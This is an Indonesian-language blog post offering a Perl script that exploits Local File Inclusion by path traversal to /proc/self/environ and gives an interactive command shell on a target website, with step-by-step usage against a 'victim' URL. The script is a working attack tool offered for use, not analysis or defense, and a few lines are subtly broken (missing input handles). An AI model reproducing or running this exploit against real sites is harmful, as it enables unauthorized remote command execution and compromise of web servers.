Local File Inclusion (LFI) Remote In Perl


Hallo sobat NubyChan 
Disini saya mempunyai script untuk menjalankan/mengeksekusi LFI proc/elft/environ secara simple di shell 

Berikut Codenya

  1. #! /usr/bin/perl
  2. use LWP;
  3. use HTTP::Request;
  4. if (@ARGV < 1)
  5. {
  6. print "\n==========================================\n";
  7. print " LFI Command Execution \n";
  8. print "==========================================\n";
  9. print "Usage: perl LFI.pl (without http:://)\n";
  10. print "Ex. perl FLI.pl www.korban.com/index.php?page=\n";
  11. exit;
  12. }
  13. $host=$ARGV[0];
  14. $lfi ="..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron";
  15. print "Try to Execution Command!\n";
  16. print "iDSc-shell# ";
  17. chomp( $cmd = );
  18. while($cmd !~ "exit")
  19. {
  20. $content = "";
  21. $ua = LWP::UserAgent->new();
  22. $ua->agent('');
  23. $request = HTTP::Request->new (GET =>"http://".$host.$lfi."&cmd=".$cmd);
  24. $response = $ua->request ($request);
  25. $content = $response->content;
  26. print $content."\n";
  27. print "iDSc-shell# ";
  28. chomp( $cmd = );
  29. }


Bagaimana Cara Menggunakannya?

1. Install perl di komputer andaa.
2. Save code di atas dengan nama : "LFI.pl".
3. Kemudian jalankan dengan perintah:" perl LFI.pl www.targetllu.com/index.php?page=\n "
4. Tunggu Hasilnya

SELAMAT MENCOBA